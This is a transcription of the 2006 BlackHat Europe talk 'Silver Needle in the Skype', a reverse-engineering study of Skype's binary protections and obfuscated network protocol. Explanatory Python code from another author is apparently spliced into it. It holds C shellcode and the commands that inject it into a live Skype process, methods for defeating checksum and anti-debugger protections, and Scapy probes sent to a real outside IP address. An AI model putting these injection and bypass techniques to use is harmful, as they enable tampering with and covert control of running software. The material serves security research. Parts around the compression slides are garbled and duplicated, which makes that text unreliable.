Skype protections Skype seen from the network Advanced/diverted Skype functions

Silver Needle in the Skype
Philippe BIONDI, Fabrice DESCLAUX

Philippe BIONDI: phil(at)secdev.org / philippe.biondi(at)eads.net
Fabrice DESCLAUX: serpilliere(at)rstack.org / fabrice.desclaux(at)eads.net
EADS Corporate Research Center — DCR/STI/C IT sec Lab, Suresnes, FRANCE

BlackHat Europe, March 2nd and 3rd, 2006

Philippe BIONDI, Fabrice DESCLAUX

Silver Needle in the Skype

1/98


Outline

1 Context of the study
2 Skype protections
    Binary packing
    Code integrity checks
    Anti debugging techniques
    Code obfuscation
3 Skype seen from the network
    Skype network obfuscation
    Low level data transport
    Thought it was over? How to speak Skype
4 Advanced/diverted Skype functions
    Analysis of the login phase
    Playing with Skype Traffic
    Nice commands
5 Conclusion

Problems with Skype
The network view

From a network security administrator point of view:
- Almost everything is obfuscated (looks like /dev/random)
- Peer to peer architecture
    - many peers
    - no clear identification of the destination peer
- Automatically reuses proxy credentials
- Traffic even when the software is not used (pings, relaying)

=⇒ Impossible to distinguish normal behaviour from information exfiltration (encrypted traffic on strange ports, night activity)
=⇒ Jams the signs of real information exfiltration


Problems with Skype
The system view

From a system security administrator point of view:
- Many protections
- Many anti-debugging tricks
- Much ciphered code
- A product that works well for free (beer)?!
- From a company not involved in Open Source?!

=⇒ Is there something to hide?
=⇒ Impossible to scan for trojan/backdoor/malware inclusion

Problems with Skype
Some legitimate questions

The Chief Security Officer point of view:
- Is Skype a backdoor?
- Can I distinguish Skype's traffic from real data exfiltration?
- Can I block Skype's traffic?
- Is Skype a risky program for my sensitive business?

Problems with Skype
Idea of usage inside companies?

[Figure: number of connected Skype users (y axis, 2e+06 to 6e+06) against time (x axis, 0 to 2500)]

At least 700k regularly used only on working days.

Problems with Skype
Context of our study

Our point of view:
- We need to interoperate Skype protocol with our firewalls
- We need to check for the presence/absence of backdoors
- We need to check the security problems induced by the use of Skype in a sensitive environment


Skype protections: Binary packing

Encryption
Avoiding static disassembly

- Some parts of the binary are xored by a hard-coded key
- In memory, Skype is fully decrypted

Skype binary decryption procedure: each encrypted part of the binary is decrypted at run time.

[Figure: the binary on disk, with a clear part and an encrypted part]

Structure overwriting
Anti-dumping tricks

1 The program erases the beginning of the code
2 The program deciphers encrypted areas
3 Skype import table is loaded, erasing part of the original import table

[Figure: memory layout after each step: code then erased code, transition code, ciphered code then deciphered code, original import table then Skype import table]

Unpacking
Binary reconstruction

Skype seems to have its own packer. We need an unpacker to build a clean binary:
1 Read internal area descriptors
2 Decipher each area using keys stored in the binary
3 Read all custom import table
4 Rebuild a new import table with the common one plus the custom one in another section
5 Patch to avoid auto decryption

Unpacking

[Figure: rebuilt binary: erased code, modified transition code, deciphered code; the old original import table and the old Skype import table are replaced by a new full import table]

Some statistics

[Figure: ciphered vs clear code; legend: code, data, unreferenced code]

Libraries used in hidden imports:
- 674 classic imports
- 169 hidden imports
- KERNEL32.dll, WINMM.dll, RPCRT4.dll, WS2_32.dll, ...


Skype protections: Code integrity checks

Checksumers scheme in Skype

[Figure: main scheme of Skype code checkers: Checker 1 / Checker' 1, Checker 2 / Checker' 2, ..., Checker N / Checker' N around the Code]

Example of a checksumer

    start:
        xor  edi, edi
        add  edi, 0x688E5C
        mov  eax, 0x320E83
        xor  eax, 0x1C4C4
        mov  ebx, 0xFFCC5AFD
    loop_start:
        mov  ecx, [edi+0x10]
        jmp  lbl1
        db   0x19
    lbl1:
        sub  eax, 0xD8FBBD1
        xor  eax, ecx
        sub  edi, 1
        dec  ebx
        jnz  loop_start
        jmp  lbl2
        db   0x73
    lbl2:
        jmp  lbl3
        dd   0xC8528417, 0xE8D6E4B7, 0xA36CFB2F, 0xC0B8797A
        db   0x61, 0xBD
    lbl3:
        sub  eax, 0x4C49F346
        add  ebx, eax

Semi polymorphic checksumers
Interesting characteristics

Each checksumer is a bit different: they seem to be polymorphic.
- They are executed randomly
- The pointers initialization is obfuscated with computations
- The loop steps have different values/signs
- The checksum operator is randomized (add, xor, sub, ...)
- The checksumer length is random
- Dummy mnemonics are inserted
- The final test is not trivial: it can use the final checksum to compute a pointer for the next code part

Semi polymorphic checksumers
But...

They are composed of:
- A pointer initialization
- A loop
- A lookup
- A test/computation

=⇒ We can build a script that spots such code

Global checksumer scheme

[Figure: graph of the checksumers; each rectangle represents a checksumer, an arrow represents the link checker/checked]

In fact, there were nearly 300 checksums.

How to get the computed value

Solution 1
- Put a breakpoint on each checksumer
- Collect all the computed values during a run of the program
Problems:
- Software breakpoints change the checksums
- We only have 4 hardware breakpoints
=⇒ Twin processes debugging

Solution 2
- Emulate the code

Twin processes debugging

1 Put software breakpoints on every checksumer of one process
2 Run it until it reaches a breakpoint
3 Put 2 hardware breakpoints before and after the checksumer of the twin process
4 Use the twin process to compute the checksum value
5 Write it down
6 Report it into the first process and jump over the checksumer
7 Go to point 2

Twin processes debugging

[Figure: the twin debugger on the PC drives Process 1 (software breakpoints) and Process 2 (hardware breakpoints)]


Twin processes debugging
Twin processes debugger using PytStop [PytStop]

    import pytstop

    # checksumer entry address -> address right after the checksumer
    checksumers = { start: stop, ... }

    p = pytstop.strace("/usr/bin/skype")   # process 1: software breakpoints
    q = pytstop.strace("/usr/bin/skype")   # process 2: hardware breakpoints

    for bp in checksumers.keys():
        p.setbp(bp)

    while 1:
        p.cont()                            # p stops at a checksumer entry
        hbp = q.sethbp(checksumers[p.eip])  # hardware breakpoint after it in q
        q.cont()                            # q computes the checksum on untouched code
        q.delhbp(hbp)
        print "Checksumer at %08x set eax=%08x" % (p.eip, q.eax)
        p.eax = q.eax                       # report the value into p
        p.eip = q.eip                       # and jump over the checksumer

Checksum execution and patch
Solution 2

1 The script is based on an x86 emulator
2 Spot the checksum entry-point: the pointer initialization
3 Detect the end of the loop
4 Compute the checksum for each one
5 Then, replace the whole loop by a simple assignment of the final checksum value

=⇒ Each checksum is always correct... And Skype runs faster! :)

Checksum execution and patch

Before (the checksumer of slide 16):

    start:
        xor  edi, edi
        add  edi, 0x688E5C
        mov  eax, 0x320E83
        xor  eax, 0x1C4C4
        mov  ebx, 0xFFCC5AFD
    loop_start:
        mov  ecx, [edi+0x10]
        jmp  lbl1
        db   0x19
    lbl1:
        sub  eax, 0xD8FBBD1
        xor  eax, ecx
        sub  edi, 1
        dec  ebx
        jnz  loop_start
        jmp  lbl2
        db   0x73
    lbl2:
        jmp  lbl3
        dd   0xC8528417, 0xE8D6E4B7, 0xA36CFB2F, 0xC0B8797A
        db   0x61, 0xBD
    lbl3:
        sub  eax, 0x4C49F346
        add  ebx, eax

After (the loop is replaced by its final value):

    start:
        xor  edi, edi
        add  edi, 0x688E5C
        mov  eax, 0x320E83
        xor  eax, 0x1C4C4
        mov  ebx, 0xFFCC5AFD
    loop_start:
        mov  ecx, [edi+0x10]
        jmp  lbl1
        db   0x19
    lbl1:
        mov  eax, 0x4C49F311
        nop
        [...]
        nop
        jmp  lbl2
        db   0x73
    lbl2:
        jmp  lbl3
        dd   0xC8528417, 0xE8D6E4B7, 0xA36CFB2F, 0xC0B8797A
        db   0x61, 0xBD
    lbl3:
        sub  eax, 0x4C49F346
        add  ebx, eax

Last but not least
Signature based integrity-check

There is a final check: an integrity check based on an RSA signature. The moduli are stored in the binary:

    lea  eax, [ebp+var_10]
    mov  edx, offset "65537"                 ; public exponent
    call to_bignum
    lea  eax, [ebp+var_C]
    mov  edx, offset "381335931360376775423064342989367511..."   ; modulus
    call to_bignum


Skype protections: Anti debugging techniques

Counter measures against dynamic attack

Skype has some protections against debuggers:
- Anti Softice: it tries to load its driver. If it works, Softice is loaded.
- Generic anti-debugger: the checksums spot software breakpoints as they change the integrity of the binary.

Counter counter measures:
- The Rasta Ring 0 Debugger [RR0D] is not detected by Skype

Binary protection: Anti debuggers

The easy one: first Softice test

    mov  eax, offset strSiwvid        ; "\\\\.\\Siwvid"
    call test_driver
    test al, al

Hidden test: it checks whether Softice is in the driver list

    call EnumDeviceDrivers

    call GetDeviceDriverBaseNameA

    cmp  eax, 'ntic'                  ; "ntice.sys", compared 4 bytes at a time
    jnz  next
    cmp  ebx, 'e.sy'
    jnz  next
    cmp  ecx, 's\x00\x00\x00'
    jnz  next

Binary protection: Anti debuggers

Anti-anti Softice: IceExt is an extension to Softice

    cmp  esi, 'icee'                  ; "iceext.sys"
    jnz  short next
    cmp  edi, 'xt.s'
    jnz  short next
    cmp  eax, 'ys\x00\x00'
    jnz  short next

Timing measures: Skype does timing measures in order to check whether the process is debugged or not

    call gettickcount
    mov  gettickcount_result, eax

Binary protection: Anti debuggers
Counter measures

When it detects an attack, it traps the debugger:
- registers are randomized
- a random page is jumped into

    pushf
    pusha
    mov  save_esp, esp
    mov  esp, ad_alloc?          ; random value
    add  esp, 20h
    sub  esp, ...
    popa
    jmp  ...                     ; random mapped page

It is difficult to trace back the detection because there is no more stack frame, no EIP...

Binary protection: Anti debuggers
Solution

- The random memory page is allocated with special characteristics
- So breakpoint on malloc(), filtered with those properties, in order to spot the creation of this page
- We then spot the pointer that stores this page location
- We can then put a hardware breakpoint to monitor it, and break in the detection code


Skype protections: Code obfuscation

Protection of sensitive code
Code obfuscation

The goal is to protect code from being reverse engineered. Principle used here: mess the code up as much as possible.

Advantages:
- Slows down code study
- Avoids direct code stealing

Drawbacks:
- Slows down the application
- Grows software size

Techniques used
Code indirection calls

    mov  eax, 9FFB40h
    sub  eax, 7F80h
    mov  edx, 7799C1Fh
    mov  ecx, [ebp-14h]
    call eax                     ; sub_9F7BC0
    neg  eax
    add  eax, 19C87A36h
    mov  edx, 0CCDACEF0h
    mov  ecx, [ebp-14h]
    call eax                     ; eax = 009F8F70

    sub_9F8F70:
    mov  eax, [ecx+34h]
    push esi
    mov  esi, [ecx+44h]
    sub  eax, 292C1156h
    add  esi, eax
    mov  eax, 371509EBh
    sub  eax, edx
    mov  [ecx+44h], esi
    xor  eax, 40F0FC15h
    pop  esi
    retn

Principle: each call is dynamically computed: difficult to follow statically.

Techniques used
Determined conditional jumps

In C, this means:

    ...
    if (sin(a) == 42) {
        do_dummy_stuff();
    }
    go_on();
    ...

Techniques used
Execution flow rerouting

    lea  edx, [esp+4+var_4]
    add  eax, 3D4D101h
    push offset area
    push edx
    mov  [esp+0Ch+var_4], eax
    call RaiseException
    rol  eax, 17h
    xor  eax, 350CA27h
    pop  ecx

Sometimes, the code raises an exception. An error handler is called. If it is a fake error, the handler tweaks memory addresses and registers =⇒ back to the calling code.

Principle: hard to understand the whole code: we have to stop the error handler and study its code.

Bypassing this little problem

In some cases we were able to avoid the analysis: we injected shellcodes to parasitize these functions.


Skype seen from the network: Skype network obfuscation

Skype on UDP
Skype UDP start of frame

Begins with a Start of Frame layer compounded of:
- a frame ID number (2 bytes)
- a type of payload (1 byte), either:
    - obfuscated payload
    - Ack / NAck packet
    - payload forwarding packet
    - payload resending packet
    - a few other things

Skype Network Obfuscation Layer

A Skype UDP datagram dissected layer by layer:

    IP          version=4  ihl=5  tos=0x0  len=46  id=4  flags=DF  frag=0  ttl=64  proto=UDP  chksum=0xeb75
                src=172.16.72.131  dst=24.98.66.80  options=''
    UDP         sport=2051  dport=8275  len=26  chksum=0x219c
    Skype SoF   id=0x7f4e  func=0x2
    Skype Crypted Data
                iv=0x118AC037  crc32=0xFC95755E  crypted='^\xb9\x81z\x8e\xf[...]'

    45 00 00 2e 00 04 40 00 40 11 eb 75 ac 10 48 83
    18 62 42 50 08 03 20 53 00 1a 21 9c 7f 4e 02 11
    8a c0 37 fc 95 75 5e 5e b9 81 7a 8e fa 81

Skype Network Obfuscation Layer

Data are encrypted with RC4. The RC4 key is calculated with elements from the datagram:
- public source and destination IP
- Skype's packet ID
- Skype's obfuscation layer's IV

[Figure: Source IP, Destination IP, ID, \x00\x00, IV -> CRC32 -> seed -> seed to RC4 key engine -> RC4 key (80 bytes)]

Skype Network Obfuscation Layer
The public IP

Problem 1: how does Skype know the public IP?
1 At the beginning, it uses 0.0.0.0
2 Its peer won't be able to decrypt the message (bad CRC)
3 =⇒ The peer sends a NAck with the public IP
4 Skype updates what it knows about its public IP accordingly

Dissection of such a NAck:

    UDP         sport=9238  dport=2051  len=19  chksum=0x854
    Skype SoF   id=0x7f4e  func=0x77
    Skype NAck  src=82.124.131.51  dst=131.134.176.86
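An added dissector (not the authors' code) for the UDP obfuscation layer of slides 40 to 43, run over the datagram of slide 41 and over a NAck payload rebuilt from the fields decoded on slide 43; payload types other than 0x02 and 0x77 are only named on the slides and are reported as unknown. The RC4 key engine is Skype's oracle and is not available here, so an obfuscated payload is split into IV, CRC32 and ciphertext but not decrypted, and reading the NAck's src field as the sender's public address is my interpretation of slide 43.

```python
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address

# Payload types shown on the slides (Start of Frame, third byte).
OBFUSCATED_PAYLOAD = 0x02
NACK = 0x77
FUNC_NAMES = {OBFUSCATED_PAYLOAD: "obfuscated payload", NACK: "NAck"}


@dataclass
class SkypeFrame:
    frame_id: int
    func: int
    fields: dict

    @property
    def kind(self) -> str:
        return FUNC_NAMES.get(self.func, f"unknown (0x{self.func:02x})")


def parse_ipv4_udp(raw: bytes) -> tuple:
    """Return (src, dst, sport, dport, udp_payload) from a raw IPv4/UDP datagram."""
    ihl = (raw[0] & 0x0F) * 4
    if raw[9] != 17:
        raise ValueError("not UDP")
    src, dst = IPv4Address(raw[12:16]), IPv4Address(raw[16:20])
    sport, dport, ulen = struct.unpack_from("!HHH", raw, ihl)
    return src, dst, sport, dport, raw[ihl + 8 : ihl + ulen]


def parse_skype_udp(payload: bytes) -> SkypeFrame:
    """Split the Start of Frame (id: 2 bytes, type: 1 byte, big endian as in the
    slide 41 dump) and decode the two payload types the slides detail."""
    if len(payload) < 3:
        raise ValueError("too short for a Start of Frame")
    frame_id, func = struct.unpack_from("!HB", payload, 0)
    body = payload[3:]
    if func == OBFUSCATED_PAYLOAD:
        if len(body) < 8:
            raise ValueError("obfuscated payload without IV and CRC32")
        iv, crc = struct.unpack_from("!II", body, 0)
        # 'crypted' is RC4 data; the key comes from the seed-to-key oracle
        # (slide 42) and cannot be derived here.
        fields = {"iv": iv, "crc32": crc, "crypted": body[8:]}
    elif func == NACK:
        if len(body) < 8:
            raise ValueError("NAck without the two addresses")
        fields = {"src": IPv4Address(body[0:4]), "dst": IPv4Address(body[4:8])}
    else:
        fields = {"raw": body}
    return SkypeFrame(frame_id, func, fields)


def learn_public_ip(nack: SkypeFrame) -> IPv4Address:
    """Slide 43: the peer that could not check the CRC answers with a NAck; the
    src field is taken as the public address it saw the datagram come from."""
    if nack.func != NACK:
        raise ValueError("not a NAck")
    return nack.fields["src"]


# The datagram shown on slide 41 (IPv4 + UDP + Skype, 46 bytes).
SLIDE_41 = bytes.fromhex(
    "45 00 00 2e 00 04 40 00 40 11 eb 75 ac 10 48 83 "
    "18 62 42 50 08 03 20 53 00 1a 21 9c 7f 4e 02 11 "
    "8a c0 37 fc 95 75 5e 5e b9 81 7a 8e fa 81"
)

# Constructed NAck UDP payload rebuilt from the decoded fields of slide 43
# (id 0x7f4e, type 0x77, src 82.124.131.51, dst 131.134.176.86).
SLIDE_43_NACK = (
    bytes.fromhex("7f 4e 77")
    + IPv4Address("82.124.131.51").packed
    + IPv4Address("131.134.176.86").packed
)


if __name__ == "__main__":
    src, dst, sport, dport, payload = parse_ipv4_udp(SLIDE_41)
    frame = parse_skype_udp(payload)
    print(f"{src}:{sport} -> {dst}:{dport}  id=0x{frame.frame_id:04x}  {frame.kind}")
    print({k: (hex(v) if isinstance(v, int) else v) for k, v in frame.fields.items()})
    nack = parse_skype_udp(SLIDE_43_NACK)
    print(f"NAck says our public address is {learn_public_ip(nack)}")
```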

Skype Network Obfuscation Layer
The seed to RC4 key engine

Problem 2: what is the seed to RC4 key engine?
- It is not an improvement of the flux capacitor
- It is a big fat obfuscated function
- It was designed to be the keystone of the network obfuscation
- The RC4 key is 80 bytes, but there are at most 2^32 different keys
- It can be seen as an oracle
- We did not want to spend time on it =⇒ we parasitized it

Note: RC4 is used for obfuscation, not for privacy.

Skype Network Obfuscation Layer
The seed to RC4 key engine

Parasitizing the seed to RC4 key engine: we injected a shellcode that
1 reads requests on a UNIX socket
2 feeds the requests to the oracle function
3 writes the answers to the UNIX socket

Skype Network Obfuscation Layer
The seed to RC4 key engine

The injected shellcode (source of oracle_shcode.c; the headers are the ones a normal build of this source needs):

    #include <sys/socket.h>
    #include <sys/un.h>
    #include <unistd.h>
    #include <stdlib.h>

    void main(void)
    {
        unsigned char key[80];
        unsigned int i, j;
        int s;
        socklen_t flen;
        struct sockaddr_un sa, from;
        char path[] = "/tmp/oracle";
        void (*oracle)(unsigned char *key, int seed);

        /* address of the seed to RC4 key function inside Skype */
        oracle = (void (*)()) 0x0724c1e;

        unlink(path);
        sa.sun_family = AF_UNIX;
        for (s = 0; s < sizeof(path); s++)
            sa.sun_path[s] = path[s];
        s = socket(PF_UNIX, SOCK_DGRAM, 0);
        bind(s, (struct sockaddr *)&sa, sizeof(sa));

        while (1) {
            flen = sizeof(from);
            /* request: a 4-byte seed */
            recvfrom(s, &i, 4, 0, (struct sockaddr *)&from, &flen);
            /* fill the 80-byte key buffer with the seed, then let the oracle derive the key */
            for (j = 0; j < 0x14; j++)
                *(unsigned int *)(key + 4 * j) = i;
            oracle(key, i);
            /* answer: the 80-byte RC4 key */
            sendto(s, key, 80, 0, (struct sockaddr *)&from, flen);
        }
        unlink(path);
        close(s);
        exit(5);
    }

Use of the shellcode

    $ shellforge.py -R oracle_shcode.c | tee oracle.bin | hexdump -C
    00000000  55 89 e5 57 56 53 81 ec  cc 01 00 00 e8 00 00 00  |U..WVS..........|
    00000010  00 5b 81 c3 ef ff ff ff  8b 93 e5 01 00 00 8b 8b  |.[..............|
    [...]
    000001d0  fe ff ff 53 bb 0b 00 00  00 cd 80 5b e9 27 ff ff  |...S.......[.'..|
    000001e0  ff 2f 74 6d 70 2f 6f 72  61 63 6c 65 00           |./tmp/oracle.|
    $ siringe -f oracle.bin -p `pidof skype`
    $ ls -lF /tmp/oracle
    srwxr-xr-x 1 pbi pbi 0 2006-01-16 13:37 /tmp/oracle=

Skype on TCP

- The seed is sent in the first 4 bytes of the stream
- The RC4 stream is used to decrypt the 10 following bytes, which should be 00 01 00 00 00 01 00 00 00 01/03
- The RC4 stream is reinitialised and used again for the remainder of the stream

Dissection of a Skype init TCP packet:

    TCP         sport=3196  dport=18812  seq=2334588416  ack=1737200067  dataofs=8  reserved=0  flags=PA
                window=2920  chksum=0x5114  urgptr=0  options=[('NOP', None), (...)]
    Skype init  seed=0x33FBAF76  init_str='(\xab\xb1\x93\n\x[...]'
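The TCP stream start of slide 48 as an added example, not code from the talk: the seed in clear, an RC4-decrypted 10-byte init string, then a re-initialised RC4 stream for the rest. Since the seed-to-RC4-key engine is the obfuscated oracle the talk did not reverse, seed_to_key below is a stand-in (SHA-256 stretched to the 80-byte key length of slide 44) and the sample stream is constructed with it; only the framing and the check are the slide's.

```python
import hashlib
import struct

# Slide 48: the 10 bytes after the seed must decrypt to this constant,
# the last byte being 0x01 or 0x03.
INIT_MAGIC = bytes([0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00])
INIT_LAST_BYTES = (0x01, 0x03)
RC4_KEY_LEN = 80   # slide 44


def seed_to_key(seed: int) -> bytes:
    """Stand-in for Skype's seed-to-key oracle: 80 deterministic bytes per seed
    (assumption; the real engine is the obfuscated function of slide 44)."""
    out, counter = b"", 0
    while len(out) < RC4_KEY_LEN:
        out += hashlib.sha256(struct.pack("!II", seed, counter)).digest()
        counter += 1
    return out[:RC4_KEY_LEN]


class RC4:
    """Plain RC4 (KSA + PRGA); each instance is a fresh keystream."""

    def __init__(self, key: bytes):
        s = list(range(256))
        j = 0
        for i in range(256):
            j = (j + s[i] + key[i % len(key)]) & 0xFF
            s[i], s[j] = s[j], s[i]
        self.s, self.i, self.j = s, 0, 0

    def crypt(self, data: bytes) -> bytes:
        s, out = self.s, bytearray()
        for byte in data:
            self.i = (self.i + 1) & 0xFF
            self.j = (self.j + s[self.i]) & 0xFF
            s[self.i], s[self.j] = s[self.j], s[self.i]
            out.append(byte ^ s[(s[self.i] + s[self.j]) & 0xFF])
        return bytes(out)


def build_stream(seed: int, last_byte: int, body: bytes) -> bytes:
    """Sender side: seed in clear (big endian, as in the slide 48 dump), then
    the init string, then the rest, each under a freshly initialised RC4."""
    key = seed_to_key(seed)
    init = RC4(key).crypt(INIT_MAGIC + bytes([last_byte]))
    rest = RC4(key).crypt(body)
    return struct.pack("!I", seed) + init + rest


def parse_stream(raw: bytes) -> tuple:
    """Receiver side: return (seed, last_init_byte, body) or raise ValueError
    when the decrypted init string is not the expected constant."""
    if len(raw) < 14:
        raise ValueError("stream too short")
    (seed,) = struct.unpack_from("!I", raw, 0)
    key = seed_to_key(seed)
    init = RC4(key).crypt(raw[4:14])
    if init[:9] != INIT_MAGIC or init[9] not in INIT_LAST_BYTES:
        raise ValueError("init string mismatch: wrong key engine or not Skype")
    body = RC4(key).crypt(raw[14:])   # keystream re-initialised for the remainder
    return seed, init[9], body


def is_skype_stream(raw: bytes) -> bool:
    """Detector-style wrapper: True when the init string decrypts as expected."""
    try:
        parse_stream(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    stream = build_stream(0x33FBAF76, 0x03, b"object list follows")
    print(stream[:14].hex(" "))
    print(parse_stream(stream))
```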


Skype seen from the network: Low level data transport

Low level datagrams: the big picture

- Almost everything is ciphered
- Data can be fragmented
- Each command comes with its parameters in an object list
- The object list can be compressed

[Figure: Enc -> SoF -> Frag / Ack / Forward / NAck -> Forwarded message -> Cmd -> Encod -> Object list -> Compressed list]

Object lists
Object List

- An object can be a number, a string, an IP:port, or even another object list
- Each object has an ID
- Skype knows which object corresponds to which command's parameter from its ID

[Figure: an object list: list size, number, IP:port, list of numbers, string, RSA key]


Skype seen from the network: Thought it was over? How to speak Skype

Packet compression

- Each packet can be compressed
- The algorithm used: arithmetic compression
- Zip would have been too easy :) (for P in packets: zip P)

Principle:
- Close to the Huffman algorithm
- Reals are used instead of bits

Arithmetic compression
Example

- [0, 1] is split in subintervals for each symbol according to their frequency
- We encode ACAB. First symbol is A. We subdivide its interval
- Then comes C
- Then A again
- Then B
- Each real enclosed in this small interval can encode ACAB

[Figure: the interval 0 | A | 0.5 | B | 0.625 | C | 1, zoomed successively into A, then C, then A, then B]


1] is splited in subintervals for each symbol according to their frequency We encode ACAB.625 C 1 Reals here encode ACAB Philippe BIONDI.5 B 0. First symbol is A.Skype protections Skype seen from the network Advanced/diverted Skype functions Skype network obfuscation Low level data transport Thought it was over? How to speak Skype Arithmetic compression Example [0. Fabrice DESCLAUX Silver Needle in the Skype 54/98 . We subdivise its interval Then comes C Then A again Then B Each real enclosed into this small interval can encode ACAB 0 A A C A 0.
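The coder sketched on the slide, carried through exactly with rational arithmetic. This is an added example and not the authors' or Skype's code; the symbol intervals A = [0, 0.5), B = [0.5, 0.625), C = [0.625, 1) are read off the slide's figure, and the decoder is given the symbol count explicitly because the slide does not show how the message end is signalled.

```python
from fractions import Fraction
import math

# Symbol intervals from the slide's figure: A = [0, 0.5), B = [0.5, 0.625),
# C = [0.625, 1).  The probabilities are therefore 1/2, 1/8 and 3/8.
MODEL = {"A": Fraction(1, 2), "B": Fraction(1, 8), "C": Fraction(3, 8)}


def symbol_ranges(model):
    """Split [0, 1) into one sub-interval per symbol, in model order."""
    ranges, low = {}, Fraction(0)
    for sym, prob in model.items():
        ranges[sym] = (low, low + prob)
        low += prob
    if low != 1:
        raise ValueError("probabilities must sum to 1")
    return ranges


def encode(message, model=MODEL):
    """Narrow [0, 1) once per symbol; any real in the final interval encodes message."""
    ranges = symbol_ranges(model)
    low, high = Fraction(0), Fraction(1)
    for sym in message:
        width = high - low
        sym_low, sym_high = ranges[sym]
        low, high = low + width * sym_low, low + width * sym_high
    return low, high


def decode(x, length, model=MODEL):
    """Recover `length` symbols from a real x inside the interval returned by encode().
    The symbol count is passed in (assumption); a real coder sends it or uses an
    end-of-message symbol."""
    x = Fraction(x)                      # floats are converted exactly
    ranges = symbol_ranges(model)
    out = []
    for _ in range(length):
        for sym, (sym_low, sym_high) in ranges.items():
            if sym_low <= x < sym_high:
                out.append(sym)
                x = (x - sym_low) / (sym_high - sym_low)   # rescale to [0, 1)
                break
        else:
            raise ValueError("x is outside [0, 1)")
    return "".join(out)


def code_length_bits(low, high):
    """Bits needed to name a point inside the interval: ceil(-log2(width))."""
    return math.ceil(-math.log2(high - low))


if __name__ == "__main__":
    low, high = encode("ACAB")
    print(low, high, float(low), float(high))   # 23/64 95/256 0.359375 0.37109375
    print(decode(low, 4), code_length_bits(low, high))
```

For ACAB the interval ends up as [23/64, 95/256), so 0.36 and 0.37 both decode to ACAB; the width 3/256 is the product of the four symbol probabilities, which is why frequ
ent symbols cost fewer bits.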

Outline (slide 55/98): section 3, Skype seen from the network: How to speak Skype.

Slide 56/98: How to speak Skype: Skypy, the Scapy add-on

- We developed an add-on to Scapy from the "binary specifications"
- It uses the Oracle Revelator shellcode and a TCP←→UNIX relay to de-obfuscate datagrams
- It can reassemble and decode obfuscated TCP streams
- It can assemble Skype packets and speak Skype

Slide 57/98: Example: a Skype startup

    >>> a=rdpcap("./cap/skype up.cap")
    >>> a[:20].nsummary()

The output is 20 summary lines of the form src:port > dst:port / Skype_SoF id=... func=... / ...; the client is 172.16.72.131 (UDP port 2051, once 3196) and the peers' addresses were scrambled in extraction. The Skype layer stacks that survive, with the destination port each one was seen on:
    Skype_SoF id=0x7f46 func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 23410)
    Skype_SoF id=0x7f48 func=0x63 / Skype_Resend                              (client :3196 to port 9238)
    Skype_SoF id=0x7f48 func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 9238)
    Skype_SoF id=0x7f48 func=0x77 / Skype_NAck                                (to the client)
    Skype_SoF id=0x7f4a func=0x7 / Skype_NAck                                 (to the client)
    Skype_SoF id=0x7f4a func=0x13 / Skype_Resend                              (to port 18812)
    Skype_SoF id=0x7f4a func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 18812)
    Skype_SoF id=0x7f4c func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 33711)
    Skype_SoF id=0x7f4e func=0x77 / Skype_NAck                                (to the client)
    Skype_SoF id=0x7f4e func=0x23 / Skype_Resend                              (to port 8275)
    Skype_SoF id=0x7f4e func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 8275)
    Skype_SoF id=0x7f50 func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 3655)
    Skype_SoF id=0x7f52 func=0x2 / Skype_Enc / Skype_Cmd cmd=27L reqid=...   (to port 37533)
    Skype_SoF id=0x7d64 func=0x2 / Skype_Enc / Skype_Cmd cmd=28L reqid=...   (to the client)
    Skype_SoF id=0xbedf func=0x2 / Skype_Enc / Skype_Cmd cmd=29L reqid=...   (to the client)

Slide 58/98: Example: a Skype startup

    >>> a[0]
    <Ether dst=00:24:13:21:54:11 src=00:12:39:94:2a:ca type=0x800 |<IP version=4L ihl=5L tos=0x0 len=46 id=0 flags=DF frag=0L ttl=64 proto=UDP chksum=0xa513 src=172.16.72.131 dst=212.[octets lost in extraction] options='' |<UDP sport=2051 dport=23410 len=26 chksum=0x9316 |<Skype_SoF id=0x7f46 func=0x2 |<Skype_Enc iv=0x93763FBL crc32=0xF28624E6L crypted='\x9a\x83)\x08K\xc6\xa8' |<Skype_Cmd cmdlen=4L is_b0=0L is_req=1L is_b2=0L cmd=27L reqid=32581 val=<Skype_Encod encod=0x42 |<Skype_Compressed val=[] |>> |>>>>>>

Slide 59/98: Example: a Skype startup

    >>> a[6][UDP].psdump(layer_shift=0.5)

Figure (hex dump with field labels):
    08 03 24 16 00 1f 13 cf                    UDP: sport=2051 dport=9238 len=31 chksum=0x13cf
    7f 48 63                                   Skype_SoF: id=0x7f48 func=0x63
    01 83 b0 86 56 82 a1 2c 75 f1 02 f0 88     Skype_Resend: adet=0x1 dst=131.176.134.86 src=130.161.44.117 crc=0xF102F088L
    fe 65 13 2c e1 97 ac                       reencrypted='\xfee\x13,\xe1\x97\xac'

Slide 60/98: Connection: request a connection to 67.172.146.158:4344

    >>> sr1(IP(dst="67.172.146.158")/UDP(sport=31337,dport=4344)/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=27, reqid=RandShort(), val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=0)))
    Begin emission:
    Finished to send 1 packets.
    *
    Received 1 packets, got 1 answers, remaining 0 packets
    <IP version=4L ihl=5L tos=0x0 len=46 id=48125 flags= frag=0L ttl=107 proto=UDP chksum=0x265 src=67.172.146.158 dst=172.16.15.2 options='' |<UDP sport=4344 dport=31337 len=26 chksum=0xa04d |<Skype_SoF id=0x2f13 func=0x2 |<Skype_Enc iv=0x8B3EBE25L crc32=0xAB015175L crypted='%\xdah\xe3P\xdd\x94' |<Skype_Cmd cmdlen=4L is_b0=1L is_req=1L is_b2=0L cmd=28L reqid=54822 val=<Skype_Encod encod=0x42 |<Skype_Compressed val=[] |>> |>>>>>

Slide 61/98: Connection: ask for other nodes' IP

    >>> sr1(IP(dst="67.172.146.158")/UDP(sport=31337,dport=4344)/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=6, reqid=RandShort(), val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=2)/Skype_Obj_Num(id=0,val=201)/Skype_Obj_Num(id=5,val=100)))
